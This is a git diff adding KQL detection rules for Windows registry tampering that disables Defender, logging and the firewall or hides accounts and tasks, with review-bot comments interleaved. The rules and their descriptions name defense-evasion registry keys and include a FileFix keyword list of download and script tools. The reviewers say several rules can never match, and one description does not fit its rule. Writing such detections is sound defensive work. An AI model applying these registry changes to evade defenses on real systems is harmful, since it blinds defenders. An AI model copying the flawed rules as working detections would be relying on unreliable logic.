+++ b/KQL/rules/windows/registry/registry_set/disable_privacy_settings_experience_in_registry.kql
@@ -0,0 +1,12 @@
+// Title: Disable Privacy Settings Experience in Registry
+// Author: frack113
+// Date: 2022-10-02
+// Level: medium
+// Description: Detects registry modifications that disable Privacy Settings Experience
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Legitimate admin script
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\Windows\\OOBE\\DisablePrivacyExperience"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/disable_pua_protection_on_windows_defender.kql b/KQL/rules/windows/registry/registry_set/disable_pua_protection_on_windows_defender.kql
new file mode 100644
index 00000000..7ea03a49
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/disable_pua_protection_on_windows_defender.kql
@@ -0,0 +1,10 @@
+// Title: Disable PUA Protection on Windows Defender
+// Author: Austin Songer @austinsonger
+// Date: 2021-08-04
+// Level: high
+// Description: Detects disabling Windows Defender PUA protection
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Policies\\Microsoft\\Windows Defender\\PUAProtection"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/disable_tamper_protection_on_windows_defender.kql b/KQL/rules/windows/registry/registry_set/disable_tamper_protection_on_windows_defender.kql
new file mode 100644
index 00000000..32689112
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/disable_tamper_protection_on_windows_defender.kql
@@ -0,0 +1,10 @@
+// Title: Disable Tamper Protection on Windows Defender
+// Author: Austin Songer @austinsonger
+// Date: 2021-08-04
+// Level: medium
+// Description: Detects disabling Windows Defender Tamper Protection
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceRegistryEvents
+| where (RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows Defender\\Features\\TamperProtection") and (not(((InitiatingProcessFolderPath endswith "\\MsMpEng.exe" and InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\") or InitiatingProcessFolderPath =~ "C:\\Program Files\\Windows Defender\\MsMpEng.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/disable_windows_defender_functionalities_via_registry_keys.kql b/KQL/rules/windows/registry/registry_set/disable_windows_defender_functionalities_via_registry_keys.kql
new file mode 100644
index 00000000..7b55237f
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/disable_windows_defender_functionalities_via_registry_keys.kql
@@ -0,0 +1,13 @@
+// Title: Disable Windows Defender Functionalities Via Registry Keys
+// Author: AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali, Swachchhanda Shrawan Poudel
+// Date: 2022-08-01
+// Level: high
+// Description: Detects when attackers or tools disable Windows Defender functionalities via the Windows registry
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Administrator actions via the Windows Defender interface
+// - Third party Antivirus
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows Defender*" or RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center*" or RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\Windows Defender*") and ((RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\DisallowExploitProtectionOverride" or RegistryKey endswith "\\Features\\TamperProtection" or RegistryKey endswith "\\MpEngine\\MpEnablePus" or RegistryKey endswith "\\PUAProtection" or RegistryKey endswith "\\Signature Update\\ForceUpdateFromMU" or RegistryKey endswith "\\SpyNet\\SpynetReporting" or RegistryKey endswith "\\SpyNet\\SubmitSamplesConsent" or RegistryKey endswith "\\Windows Defender Exploit Guard\\Controlled Folder Access\\EnableControlledFolderAccess")) or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "\\DisableAntiSpyware" or RegistryKey endswith "\\DisableAntiVirus" or RegistryKey endswith "\\DisableBehaviorMonitoring" or RegistryKey endswith "\\DisableBlockAtFirstSeen" or RegistryKey endswith "\\DisableEnhancedNotifications" or RegistryKey endswith "\\DisableIntrusionPreventionSystem" or RegistryKey endswith "\\DisableIOAVProtection" or RegistryKey endswith "\\DisableOnAccessProtection" or RegistryKey endswith "\\DisableRealtimeMonitoring" or RegistryKey endswith "\\DisableScanOnRealtimeEnable" or RegistryKey endswith "\\DisableScriptScanning"))) and
(not((InitiatingProcessFolderPath endswith "\\sepWscSvc64.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/disable_windows_event_logging_via_registry.kql b/KQL/rules/windows/registry/registry_set/disable_windows_event_logging_via_registry.kql
new file mode 100644
index 00000000..8a8e498c
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/disable_windows_event_logging_via_registry.kql
@@ -0,0 +1,12 @@
+// Title: Disable Windows Event Logging Via Registry
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-04
+// Level: high
+// Description: Detects tampering with the "Enabled" registry key in order to disable Windows logging of a Windows event channel
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.002
+// False Positives:
+// - Rare falsepositives may occur from legitimate administrators disabling specific event log for troubleshooting
+
+DeviceRegistryEvents
+| where (RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels*" and RegistryKey endswith "\\Enabled") and (not(((InitiatingProcessFolderPath endswith "\\TiWorker.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\winsxs\\") or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe" and (RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-FileInfoMinifilter" or RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-ASN1*" or RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Kernel-AppCompat*" or RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Runtime\\Error*" or RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-CAPI2/Operational*")) or (InitiatingProcessFolderPath =~ "C:\\Windows\\servicing\\TrustedInstaller.exe" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Compat-Appraiser") or InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\wevtutil.exe"))) and (not((InitiatingProcessFolderPath =~ "" or isnull(InitiatingProcessFolderPath))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/disable_windows_firewall_by_registry.kql b/KQL/rules/windows/registry/registry_set/disable_windows_firewall_by_registry.kql
new file mode 100644
index 00000000..f6313dff
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/disable_windows_firewall_by_registry.kql
@@ -0,0 +1,10 @@
+// Title: Disable Windows Firewall by Registry
+// Author: frack113
+// Date: 2022-08-19
+// Level: medium
+// Description: Detect set EnableFirewall to 0 to disable the Windows firewall
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.004
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\WindowsFirewall\\StandardProfile\\EnableFirewall" or RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\WindowsFirewall\\DomainProfile\\EnableFirewall")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/disable_windows_security_center_notifications.kql b/KQL/rules/windows/registry/registry_set/disable_windows_security_center_notifications.kql
new file mode 100644
index 00000000..a925bbff
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/disable_windows_security_center_notifications.kql
@@ -0,0 +1,10 @@
+// Title: Disable Windows Security Center Notifications
+// Author: frack113
+// Date: 2022-08-19
+// Level: medium
+// Description: Detect set UseActionCenterExperience to 0 to disable the Windows security center notification
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "Windows\\CurrentVersion\\ImmersiveShell\\UseActionCenterExperience"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/disabled_windows_defender_eventlog.kql b/KQL/rules/windows/registry/registry_set/disabled_windows_defender_eventlog.kql
new file mode 100644
index 00000000..02500d53
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/disabled_windows_defender_eventlog.kql
@@ -0,0 +1,12 @@
+// Title: Disabled Windows Defender Eventlog
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-07-04
+// Level: high
+// Description: Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Other Antivirus software installations could cause Windows to disable that eventlog (unknown)
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Windows Defender/Operational\\Enabled"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/displaying_hidden_files_feature_disabled.kql b/KQL/rules/windows/registry/registry_set/displaying_hidden_files_feature_disabled.kql
new file mode 100644
index 00000000..bdd3ff47
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/displaying_hidden_files_feature_disabled.kql
@@ -0,0 +1,11 @@
+// Title: Displaying Hidden Files Feature Disabled
+// Author: frack113
+// Date: 2022-04-02
+// Level: medium
+// Description: Detects modifications to the "Hidden" and "ShowSuperHidden" explorer registry values in order to disable showing of hidden files and system files.
+// This technique is abused by several malware families to hide their files from normal users.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.001
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden" or RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/dns_over_https_enabled_by_registry.kql b/KQL/rules/windows/registry/registry_set/dns_over_https_enabled_by_registry.kql
new file mode 100644
index 00000000..941e415c
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/dns_over_https_enabled_by_registry.kql
@@ -0,0 +1,14 @@
+// Title: DNS-over-HTTPS Enabled by Registry
+// Author: Austin Songer
+// Date: 2021-07-22
+// Level: medium
+// Description: Detects when a user enables DNS-over-HTTPS.
+// This can be used to hide internet activity or be used to hide the process of exfiltrating data.
+// With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1140, attack.t1112
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where (RegistryValueData =~ "secure" and RegistryKey endswith "\\SOFTWARE\\Google\\Chrome\\DnsOverHttpsMode") or (RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\Edge\\BuiltInDnsClientEnabled") or (RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\SOFTWARE\\Policies\\Mozilla\\Firefox\\DNSOverHTTPS\\Enabled")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/driver_added_to_disallowed_images_in_hvci_registry.kql b/KQL/rules/windows/registry/registry_set/driver_added_to_disallowed_images_in_hvci_registry.kql
new file mode 100644
index 00000000..65d774ac
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/driver_added_to_disallowed_images_in_hvci_registry.kql
@@ -0,0 +1,12 @@
+// Title: Driver Added To Disallowed Images In HVCI - Registry
+// Author: Nasreddine Bencherchali (Nextron Systems), Omar Khaled (@beacon_exe)
+// Date: 2023-12-05
+// Level: high
+// Description: Detects changes to the "HVCIDisallowedImages" registry value to potentially add a driver to the list, in order to prevent it from loading.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Legitimate usage of this key would also trigger this. Investigate the driver being added and make sure its intended
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Control\\CI*" and RegistryKey contains "\\HVCIDisallowedImages"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/enable_lm_hash_storage.kql b/KQL/rules/windows/registry/registry_set/enable_lm_hash_storage.kql
new file mode 100644
index 00000000..92e70a89
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/enable_lm_hash_storage.kql
@@ -0,0 +1,11 @@
+// Title: Enable LM Hash Storage
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-12-15
+// Level: high
+// Description: Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes.
+// By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "System\\CurrentControlSet\\Control\\Lsa\\NoLMHash"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/enable_local_manifest_installation_with_winget.kql b/KQL/rules/windows/registry/registry_set/enable_local_manifest_installation_with_winget.kql
new file mode 100644
index 00000000..5ce08bb7
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/enable_local_manifest_installation_with_winget.kql
@@ -0,0 +1,12 @@
+// Title: Enable Local Manifest Installation With Winget
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-17
+// Level: medium
+// Description: Detects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence
+// False Positives:
+// - Administrators or developers might enable this for testing purposes or to install custom private packages
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\AppInstaller\\EnableLocalManifestFiles"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/enable_microsoft_dynamic_data_exchange.kql b/KQL/rules/windows/registry/registry_set/enable_microsoft_dynamic_data_exchange.kql
new file mode 100644
index 00000000..9f357ea4
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/enable_microsoft_dynamic_data_exchange.kql
@@ -0,0 +1,10 @@
+// Title: Enable Microsoft Dynamic Data Exchange
+// Author: frack113
+// Date: 2022-02-26
+// Level: medium
+// Description: Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1559.002
+
+DeviceRegistryEvents
+| where (RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\Excel\\Security\\DisableDDEServerLaunch" or RegistryKey endswith "\\Excel\\Security\\DisableDDEServerLookup")) or ((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000002)")) and RegistryKey endswith "\\Word\\Security\\AllowDDE")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/enabling_cor_profiler_environment_variables.kql b/KQL/rules/windows/registry/registry_set/enabling_cor_profiler_environment_variables.kql
new file mode 100644
index 00000000..09982deb
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/enabling_cor_profiler_environment_variables.kql
@@ -0,0 +1,10 @@
+// Title: Enabling COR Profiler Environment Variables
+// Author: Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research), Jimmy Bayne (@bohops)
+// Date: 2020-09-10
+// Level: medium
+// Description: Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.012
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\COR_ENABLE_PROFILING" or RegistryKey endswith "\\COR_PROFILER" or RegistryKey endswith "\\CORECLR_ENABLE_PROFILING") or RegistryKey contains "\\CORECLR_PROFILER_PATH"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/etw_logging_disabled_for_rpcrt4_dll.kql b/KQL/rules/windows/registry/registry_set/etw_logging_disabled_for_rpcrt4_dll.kql
new file mode 100644
index 00000000..0e260f96
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/etw_logging_disabled_for_rpcrt4_dll.kql
@@ -0,0 +1,10 @@
+// Title: ETW Logging Disabled For rpcrt4.dll
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-09
+// Level: low
+// Description: Detects changes to the "ExtErrorInformation" key in order to disable ETW logging for rpcrt4.dll
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112, attack.t1562
+
+DeviceRegistryEvents
+| where (RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000002)")) and RegistryKey endswith "\\Microsoft\\Windows NT\\Rpc\\ExtErrorInformation"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/etw_logging_disabled_for_scm.kql b/KQL/rules/windows/registry/registry_set/etw_logging_disabled_for_scm.kql
new file mode 100644
index 00000000..854243f6
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/etw_logging_disabled_for_scm.kql
@@ -0,0 +1,10 @@
+// Title: ETW Logging Disabled For SCM
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-09
+// Level: low
+// Description: Detects changes to the "TracingDisabled" key in order to disable ETW logging for services.exe (SCM)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112, attack.t1562
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "Software\\Microsoft\\Windows NT\\CurrentVersion\\Tracing\\SCM\\Regular\\TracingDisabled"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/etw_logging_disabled_in_net_processes_sysmon_registry.kql b/KQL/rules/windows/registry/registry_set/etw_logging_disabled_in_net_processes_sysmon_registry.kql
new file mode 100644
index 00000000..e785f6eb
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/etw_logging_disabled_in_net_processes_sysmon_registry.kql
@@ -0,0 +1,10 @@
+// Title: ETW Logging Disabled In .NET Processes - Sysmon Registry
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-06-05
+// Level: high
+// Description: Potential adversaries stopping ETW providers recording loaded .NET assemblies.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112, attack.t1562
+
+DeviceRegistryEvents
+| where ((RegistryValueData in~ ("0", "DWORD (0x00000000)")) and (RegistryKey endswith "\\COMPlus_ETWEnabled" or RegistryKey endswith "\\COMPlus_ETWFlags")) or (RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "SOFTWARE\\Microsoft\\.NETFramework\\ETWEnabled")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/execution_dll_of_choice_using_wab_exe.kql b/KQL/rules/windows/registry/registry_set/execution_dll_of_choice_using_wab_exe.kql
new file mode 100644
index 00000000..8cb98ccc
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/execution_dll_of_choice_using_wab_exe.kql
@@ -0,0 +1,10 @@
+// Title: Execution DLL of Choice Using WAB.EXE
+// Author: oscd.community, Natalia Shornikova
+// Date: 2020-10-13
+// Level: high
+// Description: This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Software\\Microsoft\\WAB\\DLLPath" and (not(RegistryValueData =~ "%CommonProgramFiles%\\System\\wab32.dll"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/filefix_command_evidence_in_typedpaths.kql b/KQL/rules/windows/registry/registry_set/filefix_command_evidence_in_typedpaths.kql
new file mode 100644
index 00000000..7b4053da
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/filefix_command_evidence_in_typedpaths.kql
@@ -0,0 +1,10 @@
+// Title: FileFix - Command Evidence in TypedPaths
+// Author: Alfie Champion (delivr.to), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-07-05
+// Level: high
+// Description: Detects commonly-used chained commands and strings in the most recent 'url' value of the 'TypedPaths' key, which could be indicative of a user being targeted by the FileFix technique.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.004
+
+DeviceRegistryEvents
+| where ((RegistryValueData contains "#" and RegistryValueData contains "http") and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths\\url1") and ((RegistryValueData contains "account" or RegistryValueData contains "anti-bot" or RegistryValueData contains "botcheck" or RegistryValueData contains "captcha" or RegistryValueData contains "challenge" or RegistryValueData contains "confirmation" or RegistryValueData contains "fraud" or RegistryValueData contains "human" or RegistryValueData contains "identification" or RegistryValueData contains "identificator" or RegistryValueData contains "identity" or RegistryValueData contains "robot" or RegistryValueData contains "validation" or RegistryValueData contains "verification" or RegistryValueData contains "verify") or (RegistryValueData contains "%comspec%" or RegistryValueData contains "bitsadmin" or RegistryValueData contains "certutil" or RegistryValueData contains "cmd" or RegistryValueData contains "cscript" or RegistryValueData contains "curl" or RegistryValueData contains "finger" or RegistryValueData contains "mshta" or RegistryValueData contains "powershell" or RegistryValueData contains "pwsh" or RegistryValueData contains "regsvr32" or RegistryValueData contains "rundll32" or RegistryValueData contains "schtasks" or RegistryValueData contains "wget" or RegistryValueData contains "wscript"))
\ No newline at end of file
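Review bot: The key test `RegistryKey endswith "...\\Explorer\\TypedPaths\\url1"` cannot match because `url1` is a value name, which Defender reports in `RegistryValueName`; the rule never fires. Change it to `RegistryKey endswith "\\Explorer\\TypedPaths" and RegistryValueName =~ "url1"`. Once that is fixed expect noise from the second keyword list: `contains "cmd"`, `"human"`, `"account"` or `"identity"` will hit ordinary URLs that happen to carry a `#` fragment, so the `#` plus `http` guard in the first group is doing most of the work and the `high` level may need revisiting after a baseline.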
diff --git a/KQL/rules/windows/registry/registry_set/hide_schedule_task_via_index_value_tamper.kql b/KQL/rules/windows/registry/registry_set/hide_schedule_task_via_index_value_tamper.kql
new file mode 100644
index 00000000..d34e214f
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/hide_schedule_task_via_index_value_tamper.kql
@@ -0,0 +1,13 @@
+// Title: Hide Schedule Task Via Index Value Tamper
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-26
+// Level: high
+// Description: Detects when the "index" value of a scheduled task is modified from the registry
+// Which effectively hides it from any tooling such as "schtasks /query" (Read the referenced link for more information about the effects of this technique)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*" and RegistryKey contains "Index")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/hiding_user_account_via_specialaccounts_registry_key.kql b/KQL/rules/windows/registry/registry_set/hiding_user_account_via_specialaccounts_registry_key.kql
new file mode 100644
index 00000000..f5eca91e
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/hiding_user_account_via_specialaccounts_registry_key.kql
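Review bot: `RegistryKey endswith "...\\Schedule\\TaskCache\\Tree*"` treats the `*` as a literal character in KQL, not a wildcard, so the condition demands a key that ends in `Tree*` and this `high` rule never fires. The Sigma trailing wildcard should become `RegistryKey contains "\\Schedule\\TaskCache\\Tree\\"`, and since `Index` is the value name the second test should be `RegistryValueName =~ "Index"` with `RegistryValueData == "0"` in place of the Sysmon-formatted `DWORD (0x00000000)`. The same `*`-inside-a-string pattern appears in several other files in this commit, so the converter's wildcard handling needs fixing rather than this file alone.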
@@ -0,0 +1,10 @@
+// Title: Hiding User Account Via SpecialAccounts Registry Key
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113
+// Date: 2022-07-12
+// Level: high
+// Description: Detects modifications to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.002
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/hypervisor_enforced_code_integrity_disabled.kql b/KQL/rules/windows/registry/registry_set/hypervisor_enforced_code_integrity_disabled.kql
new file mode 100644
index 00000000..24dd96b5
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/hypervisor_enforced_code_integrity_disabled.kql
@@ -0,0 +1,10 @@
+// Title: Hypervisor Enforced Code Integrity Disabled
+// Author: Nasreddine Bencherchali (Nextron Systems), Anish Bogati
+// Date: 2023-03-14
+// Level: high
+// Description: Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code to be run in the kernel
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\Control\\DeviceGuard\\HypervisorEnforcedCodeIntegrity" or RegistryKey endswith "\\Control\\DeviceGuard\\Scenarios\\HypervisorEnforcedCodeIntegrity\\Enabled" or RegistryKey endswith "\\Microsoft\\Windows\\DeviceGuard\\HypervisorEnforcedCodeIntegrity")
\ No newline at end of file
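Review bot: In hypervisor_enforced_code_integrity_disabled.kql all three `RegistryKey endswith` alternatives end in a value name (`HypervisorEnforcedCodeIntegrity` under a `DeviceGuard` key, `Enabled` under `Scenarios\\HypervisorEnforcedCodeIntegrity`), which Defender exposes as `RegistryValueName`, so none can match and this `high` rule is dead. Suggest `| where RegistryValueData == "0" and ((RegistryKey endswith "\\DeviceGuard" and RegistryValueName =~ "HypervisorEnforcedCodeIntegrity") or (RegistryKey endswith "\\Scenarios\\HypervisorEnforcedCodeIntegrity" and RegistryValueName =~ "Enabled"))`. The `endswith "\\DeviceGuard"` form still covers both the `Control\\DeviceGuard` and `Policies\\...\\Windows\\DeviceGuard` parents the original lists.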
diff --git a/KQL/rules/windows/registry/registry_set/hypervisor_enforced_paging_translation_disabled.kql b/KQL/rules/windows/registry/registry_set/hypervisor_enforced_paging_translation_disabled.kql
new file mode 100644
index 00000000..7db4db68
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/hypervisor_enforced_paging_translation_disabled.kql
@@ -0,0 +1,10 @@
+// Title: Hypervisor Enforced Paging Translation Disabled
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-07-05
+// Level: high
+// Description: Detects changes to the "DisableHypervisorEnforcedPagingTranslation" registry value. Where the it is set to "1" in order to disable the Hypervisor Enforced Paging Translation feature.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\DisableHypervisorEnforcedPagingTranslation"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/ie_change_domain_zone.kql b/KQL/rules/windows/registry/registry_set/ie_change_domain_zone.kql
new file mode 100644
index 00000000..e517c9d5
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/ie_change_domain_zone.kql
@@ -0,0 +1,12 @@
+// Title: IE Change Domain Zone
+// Author: frack113
+// Date: 2022-01-22
+// Level: medium
+// Description: Hides the file extension through modification of the registry
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1137
+// False Positives:
+// - Administrative scripts
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains*" and (not((RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000001)", "(Empty)"))))
\ No newline at end of file
